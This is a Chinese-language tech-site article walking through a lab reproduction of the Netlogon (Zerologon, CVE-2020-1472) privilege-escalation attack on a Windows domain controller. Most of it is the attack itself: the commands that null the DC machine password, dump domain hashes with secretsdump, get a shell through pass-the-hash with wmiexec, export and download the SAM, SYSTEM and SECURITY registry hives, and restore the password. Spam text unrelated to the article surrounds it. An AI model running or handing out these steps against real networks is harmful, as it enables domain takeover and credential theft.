中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Netlogon特權提升漏洞CVE 2020-1472該如何復習

發布時間:2021-12-28 17:18:35 來源:億速云 閱讀:133 作者:柒染 欄目:安全技術

Netlogon特權提升漏洞CVE 2020-1472該如何復習,很多新手對此不是很清楚,為了幫助大家解決這個難題,下面小編將為大家詳細講解,有這方面需求的人可以來學習下,希望你能有所收獲。

1.復現環境

DC:
os:windows 2012 server
ip:192.168.236.132

攻擊機:
os:kali
ip:192.168.236.130

2.影響版本

Windows Server 2008 R2 for x64-based Systems
Service Pack 1Windows Server 2008 R2 for x64-based
Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)

3.域控環境搭建參考文章

sectool/251828.html

4.復現過程

4.1 漏洞驗證

POC鏈接

Netlogon特權提升漏洞CVE 2020-1472該如何復習

Netlogon特權提升漏洞CVE 2020-1472該如何復習

4.2 漏洞利用

安裝最新的Impacket,否則會報錯

Netlogon特權提升漏洞CVE 2020-1472該如何復習

4.2.1 下載攻擊exp

EXP下載

Netlogon特權提升漏洞CVE 2020-1472該如何復習

4.2.2 置空密碼

python3 cve-2020-1472-exploit.py WIN-F6STUQIU7D8 192.168.236.132

Netlogon特權提升漏洞CVE 2020-1472該如何復習

4.2.3 獲取hash

進入到impacket/examples

python3 secretsdump.py DOMAIN/WIN-F6STUQIU7D8\$@192.168.236.132 -just-dc -no-pass

Netlogon特權提升漏洞CVE 2020-1472該如何復習

4.2.4 獲取shell

python3 wmiexec.py -hashes <HASH> DOMAIN/administrator\@IP

Netlogon特權提升漏洞CVE 2020-1472該如何復習

4.2.5 獲取原hash

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save
exit

Netlogon特權提升漏洞CVE 2020-1472該如何復習

4.2.6 解析hash

保存$MACHINE.ACC部分:XXXXXXXXXXXXXX:XXXXXXX

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

4.2.7 恢復hash

恢復鏈接

python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR <ORI_HASH>

Netlogon特權提升漏洞CVE 2020-1472該如何復習

4.2.8 驗證是否恢復

使用獲取hash的命令來驗證是否恢復

python3 secretsdump.py DOMAIN/DC_NETBIOS_NAME\$@DC_IP_ADDR -just-dc -no-pass

Netlogon特權提升漏洞CVE 2020-1472該如何復習

5.修復建議

官方修復建議

看完上述內容是否對您有幫助呢?如果還想對相關知識有進一步的了解或閱讀更多相關文章,請關注億速云行業資訊頻道,感謝您對億速云的支持。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

上饶县| 东乡县| 漾濞| 中宁县| 康保县| 华亭县| 白玉县| 莱阳市| 酉阳| 张家港市| 囊谦县| 中山市| 昌都县| 锦州市| 江山市| 金门县| 佛山市| 赤壁市| 铜川市| 湾仔区| 赫章县| 孝义市| 彩票| 白河县| 喀喇| 若羌县| 西安市| 宿州市| 丰宁| 阜阳市| 苗栗县| 钟山县| 天镇县| 榆中县| 南康市| 措美县| 无锡市| 翁源县| 梁平县| 库尔勒市| 兴国县|